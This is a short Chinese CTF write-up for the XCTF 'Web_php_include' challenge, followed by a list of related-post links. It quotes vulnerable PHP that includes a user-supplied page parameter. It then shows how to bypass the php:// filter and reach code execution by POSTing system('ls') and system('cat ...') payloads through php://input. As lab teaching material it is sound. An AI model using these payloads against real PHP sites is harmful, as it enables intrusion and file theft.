Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
cike_y4 小时前
浅谈用docker搭建一个ctf镜像
运维·安全·网络安全·docker·容器·ctf
clown_YZ9 小时前
Glacier CTF 2025--部分题解
网络安全·逆向·ctf
pandarking15 小时前
[CTF]攻防世界:SSRF Me
web安全·ctf
!!!!!!!!!!!!!!!!.15 小时前
CTF WEB入门 命令执行篇71-124
笔记·学习·安全·ctf
三七吃山漆1 天前
攻防世界——supersqli
数据库·网络安全·web·ctf
saulgoodman-q1 天前
Pwncollege V8 Exploitation (上)
pwn·ctf
漏洞文库-Web安全1 天前
CTFHub-RCE漏洞wp
android·安全·web安全·网络安全·ctf·ctfhub
月光技术杂谈2 天前
基于Python+Selenium的淘宝商品信息智能采集实践:从浏览器控制到反爬应对
爬虫·python·selenium·自动化·web·电商·淘宝
漏洞文库-Web安全2 天前
CTFHub XSS通关:XSS-过滤关键词 - 教程
前端·安全·web安全·okhttp·网络安全·ctf·xss
漏洞文库-Web安全2 天前
CTFHub 信息泄露通关笔记9:Git泄露 Index - 指南
笔记·git·安全·web安全·elasticsearch·网络安全·ctf